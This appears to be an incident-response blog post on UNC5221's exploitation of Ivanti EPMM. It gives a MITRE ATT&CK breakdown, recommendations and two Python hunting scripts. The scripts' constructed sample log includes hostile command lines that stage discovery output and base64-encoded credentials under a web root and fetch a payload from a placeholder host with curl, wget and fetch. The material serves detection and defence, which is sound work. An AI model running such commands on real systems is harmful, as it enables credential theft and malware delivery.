BLOG
June 4, 2025
China-Sponsored Threat Actor UNC5221 Exploits Ivanti Endpoint Manager: What You Need To Know
Adarma’s Incident Response Team breaks down the attack chain, technical indicators, and mitigation guidance.
Adarma’s Incident Response team recently responded to an incident involving the exploitation of Ivanti Endpoint Manager Mobile (EPMM) through a recently patched pair of vulnerabilities, CVE-2025-4427 and CVE-2025-4428, which, when chained, enable unauthenticated remote code execution on vulnerable appliances.
The intrusion is believed to be part of a broader campaign attributed to UNC5221, a threat group linked to the People’s Republic of China and thought to be associated with the APT known as Gothic Panda. UNC5221 runs exploitation campaigns against vulnerabilities in network edge appliances in particular, using them to gain footholds on the networks that host those devices, harvest credentials, and move laterally in pursuit of confidential or proprietary information to exfiltrate.
UNC5221 has a track record of exploiting vulnerabilities in edge infrastructure and targeting critical sectors across Europe, North America and Asia-Pacific, including critical national infrastructure and the government, financial and technology sectors.
Key Insights
• These vulnerabilities were disclosed and patched by Ivanti on 13 May 2025; exploitation in this incident took place two days later.
• The attacker exploited the Ivanti appliance vulnerabilities before patching could be completed, demonstrating rapid operational use of newly disclosed vulnerabilities.
• The threat actor’s methods and infrastructure overlap with other UNC5221 campaigns, including mass exploitation of SAP NetWeaver instances (CVE-2025-31324) and exploitation of Ivanti Connect Secure zero-days in late 2023.
• The compromise progressed quickly from initial access through local reconnaissance, credential theft, staging and exfiltration, consistent with strategic pre-positioning rather than opportunistic activity.
• The malware retrieved by the threat actor failed to execute, and the redundant use of several commands to achieve the same goal suggests unfamiliarity or uncertainty about the targeted appliance environment, which in turn points to how quickly this campaign was spun up.
Technical Breakdown
Attack Flow Summary
Based on timestamps of commands run, Adarma’s Incident Response Team believes the attacker’s activities were automated.
The threat actor gained access to the Ivanti EPMM through a chain of two vulnerabilities, CVE-2025-4427 (CVSS v3 score: 5.3) and CVE-2025-4428 (CVSS v3 score: 7.2), enabling unauthenticated remote code execution.
Once access was gained, the attacker ran multiple discovery commands and output the results to files disguised with .jpg extensions, saved in web-accessible folders for exfiltration.
Harvested credentials and certificates were also staged in this way, encoded in base64 and saved as .css files.
The attacker then retrieved a file from Amazon-hosted cloud storage, later identified as the malware known as KrustyLoader. This loader was intended to install a Sliver C2 agent configured to communicate with Amazon-hosted cloud infrastructure.
To improve the chance of a successful download, the attacker issued curl, wget and fetch commands for the same file, suggesting a scripted approach with built-in redundancy for whichever download tool happened to be available on the EPMM appliance. The Sliver agent ultimately failed to execute.
MITRE ATT&CK
Below we map the phases of the breach, and the actions the threat actor took during the intrusion, to the MITRE ATT&CK framework.
Initial Access
T1190 – Exploit Public-Facing Application
The threat actor chained CVE-2025-4427 and CVE-2025-4428 to gain initial access. These vulnerabilities affect the Linux-based Ivanti EPMM appliance and, when chained, enable unauthenticated remote code execution.
Defense Evasion
T1027.010 – Obfuscated Files or Information: Command Obfuscation
The threat actor used base64 encoding in some of the scripted activity run on the breached appliance. Stolen credentials were also base64 encoded when written to files for collection.
Discovery
T1087.001 – Account Discovery: Local Account
T1033 – System Owner/User Discovery
T1082 – System Information Discovery
T1049 – System Network Connections Discovery
The threat actor issued discovery commands such as id, netstat, hostname, uname and whoami, with the output redirected to files for collection and exfiltration. These results allowed the attacker to map the environment afterwards and identify viable lateral movement paths.
Command and Control
T1105 – Ingress Tool Transfer
The threat actor retrieved from Amazon-hosted cloud storage a file that Adarma’s Incident Response Team determined to be KrustyLoader malware. Curl, wget and fetch commands were issued for the same file, presumably so that the download would succeed with whichever program was present on the EPMM appliance. KrustyLoader was intended to deploy a Sliver C2 agent, which failed to run.
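The discovery-then-stage and curl/wget/fetch patterns described in this section and the one above are distinctive enough to hunt for in command-line telemetry. The following script is an added example written for this page, not Adarma's detection content. It assumes a normalised log format of one command per line as "<ISO timestamp> <user> <command line>" (what a bash audit log or process-creation feed can be reduced to), assumes the web-served roots listed in WEB_PATHS, and runs over constructed sample lines, not data from the incident.

```python
"""Flag post-exploitation command patterns in appliance shell logs.

Added example, not Adarma's tooling. Assumptions: log lines are
"<ISO timestamp> <user> <command>", and WEB_PATHS lists the directories the
appliance's web server exposes. SAMPLE_LOG is constructed, not incident data.
Three patterns are reported:
  1. command output redirected under a web root with an image or stylesheet
     extension (local staging for later retrieval), noting when the command
     is a discovery command such as id, uname or netstat;
  2. base64 on the command line (credential dumps were base64 encoded);
  3. curl, wget and fetch all issued for the same URL within a short window,
     the shape a script with download fallbacks produces.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re
import shlex

DISCOVERY = {"id", "whoami", "hostname", "uname", "netstat", "ss", "ifconfig", "ip"}
DOWNLOADERS = {"curl", "wget", "fetch"}
WEB_PATHS = ("/var/www/", "/usr/share/nginx/html/")   # assumed; tune per appliance
LOOT_EXT = (".jpg", ".jpeg", ".png", ".css")
URL_RE = re.compile(r"https?://\S+")
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")
REDIRECT_RE = re.compile(r">{1,2}\s*(\S+)")

def parse_line(line):
    """Split one normalised log line into (timestamp, user, command) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, user, cmd = m.groups()
    return datetime.fromisoformat(ts), user, cmd

def program(cmd):
    """Basename of the first token, so /bin/id and id compare equal."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:
        tokens = cmd.split()
    return tokens[0].rsplit("/", 1)[-1] if tokens else ""

def classify(cmd):
    """Labels for a single command line: staging under a web root, base64 use."""
    labels = []
    prog = program(cmd)
    m = REDIRECT_RE.search(cmd)
    target = m.group(1) if m else ""
    if target.startswith(WEB_PATHS) and target.lower().endswith(LOOT_EXT):
        what = "discovery output" if prog in DISCOVERY else "command output"
        labels.append(f"{what} staged under web root as .{target.rsplit('.', 1)[-1]}")
    if re.search(r"\bbase64\b", cmd):
        labels.append("base64 on command line")
    return labels

def downloader_fallbacks(events, window=timedelta(seconds=30)):
    """URLs requested by more than one of curl/wget/fetch within `window`.

    A script trying each downloader in turn produces exactly this shape;
    an interactive operator normally stops after the first success."""
    by_url = defaultdict(list)
    for ts, _user, cmd in events:
        url = URL_RE.search(cmd)
        if url and program(cmd) in DOWNLOADERS:
            by_url[url.group(0)].append((ts, program(cmd)))
    hits = []
    for url, uses in by_url.items():
        uses.sort()
        progs = sorted({p for _, p in uses})
        if len(progs) > 1 and uses[-1][0] - uses[0][0] <= window:
            hits.append((uses[0][0], url, progs))
    return hits

def analyse(lines):
    """Return (timestamp, label, detail) findings for a list of log lines."""
    events = [e for e in map(parse_line, lines) if e]
    findings = [(ts.isoformat(), label, cmd)
                for ts, _user, cmd in events for label in classify(cmd)]
    findings += [(ts.isoformat(), "same URL fetched by " + ",".join(progs), url)
                 for ts, url, progs in downloader_fallbacks(events)]
    return findings

# Constructed sample log; user, paths and the download host are placeholders.
SAMPLE_LOG = """\
2025-05-15T10:02:11 www /bin/id > /var/www/images/1.jpg
2025-05-15T10:02:12 www uname -a >> /var/www/images/1.jpg
2025-05-15T10:02:13 www netstat -an > /var/www/images/2.jpg
2025-05-15T10:02:15 www cat /tmp/creds.txt | base64 -w0 > /var/www/css/x.css
2025-05-15T10:02:20 www curl -s -o /tmp/p https://bucket.example.net/p
2025-05-15T10:02:21 www wget -q -O /tmp/p https://bucket.example.net/p
2025-05-15T10:02:22 www fetch -o /tmp/p https://bucket.example.net/p
2025-05-15T10:05:00 admin ls -la /var/log
"""

if __name__ == "__main__":
    for ts, label, detail in analyse(SAMPLE_LOG.splitlines()):
        print(f"{ts} {label}: {detail}")
```

The downloader check deliberately keys on the URL rather than the tool name: a single curl to an unknown host is common on an appliance that fetches updates, whereas three different tools asked for the same object within seconds is the fingerprint of a scripted fallback. Widen WEB_PATHS to whatever directories the appliance's web server actually serves before running this against real telemetry.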
Credential Access
T1213 – Data from Information Repositories
T1649 – Steal or Forge Authentication Certificates
Post-compromise, the attacker harvested credentials stored in the MySQL database on the appliance. Appliance-specific certificates were also collected and staged for exfiltration.
Collection
T1074.001 – Data Staged: Local Data Staging
The output of the discovery commands was redirected to files with a .jpg extension, saved in web-accessible directories for later retrieval. The output of the commands used for credential and certificate access was base64 encoded and saved as .css files in the same web-accessible directories. The files were deleted once they had been retrieved.
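Because the staged files were deleted after retrieval, an on-disk check only helps if it runs before the attacker collects, or against a forensic image, but it is cheap and catches the masquerade directly: a .jpg that does not start with JPEG magic bytes, or a .css that is one base64 blob decoding to readable text, is loot rather than a web asset. The scanner below is an added example for this page, not Adarma's tooling; the sample web root it builds is constructed, and the credential and certificate strings in it are placeholders.

```python
"""Hunt for staged data masquerading as web assets (.jpg / .css).

Added example, not Adarma's tooling. Two content-versus-extension checks:
  - .jpg/.jpeg whose bytes do not start with the JPEG magic (FF D8 FF),
    as when command output is saved under an image name;
  - .css whose whole content is a base64 blob that decodes to printable text,
    as when a credential or certificate dump is saved under a stylesheet name.
build_sample_webroot() creates a constructed temporary directory so the
script runs offline; point find_masquerading_files() at a real document
root or a mounted forensic image instead.
"""
import base64
import binascii
import os
import re
import string
import tempfile

JPEG_MAGIC = b"\xff\xd8\xff"
B64_RE = re.compile(rb"^[A-Za-z0-9+/\s]+={0,2}\s*$")
PRINTABLE = set(string.printable.encode())

def looks_like_base64_text(data: bytes) -> bool:
    """True if data is a single base64 blob that decodes to printable text."""
    if len(data) < 16 or not B64_RE.match(data):
        return False
    try:
        decoded = base64.b64decode(b"".join(data.split()), validate=True)
    except (binascii.Error, ValueError):
        return False
    return bool(decoded) and all(b in PRINTABLE for b in decoded)

def inspect_file(path: str):
    """Reason string if the file's content contradicts its extension, else None."""
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read(65536)   # header plus enough body to classify
    if ext in (".jpg", ".jpeg") and not data.startswith(JPEG_MAGIC):
        return "jpg extension without JPEG magic bytes"
    if ext == ".css" and looks_like_base64_text(data):
        return "css extension but content is a base64 blob"
    return None

def find_masquerading_files(root: str):
    """Walk root (a web document root) and return sorted (relpath, reason) hits."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            reason = inspect_file(path)
            if reason:
                hits.append((os.path.relpath(path, root), reason))
    return sorted(hits)

def build_sample_webroot() -> str:
    """Constructed sample web root mixing legitimate assets with staged loot."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "images"))
    files = {
        # a real JPEG header padded out, i.e. a legitimate image
        "images/logo.jpg": JPEG_MAGIC + b"\xe0" + b"\x00" * 64,
        # 'id' output saved under an image name
        "images/1.jpg": b"uid=0(root) gid=0(root) groups=0(root)\n",
        # a legitimate stylesheet
        "site.css": b"body { color: #333; margin: 0; }\n",
        # placeholder credential and certificate text, base64 encoded, saved as .css
        "x.css": base64.b64encode(
            b"dbuser:PlaceholderPassw0rd\n-----BEGIN CERTIFICATE-----\nMIIBplaceholder\n"),
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    for rel, reason in find_masquerading_files(build_sample_webroot()):
        print(f"{rel}: {reason}")
```

Magic-byte and base64 checks are a starting point: extend the extension map to whatever asset types the appliance serves, and add a size or mtime filter so that recently written files under the web root surface first.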
Exfiltration
T1567 – Exfiltration Over Web Service
The files staged in web-accessible directories were retrieved by the attacker over the appliance’s web interface.
Adarma Defensive Recommendations
To defend against campaigns like this, Adarma’s Threat Intelligence Team recommends the following actions to mitigate the risks associated with this group:
• Apply security patches to exposed infrastructure as soon as they’re released, especially for VPNs and other network edge appliances.
• Assume public-facing systems are under continuous probing and prioritise network edge vulnerability scanning and remediation.
• Isolate management interfaces from the internet and enforce strong authentication, including multi-factor authentication.
• Review and monitor network edge appliance operating systems logs for early indicators of credential harvesting, reconnaissance, or abnormal service interaction.
• Deploy and tune Endpoint Detection and Response tools with a focus on behavioural triggers linked to post-exploitation activity.
• Conduct red team exercises that simulate exploitation of recent CVEs to validate response readiness.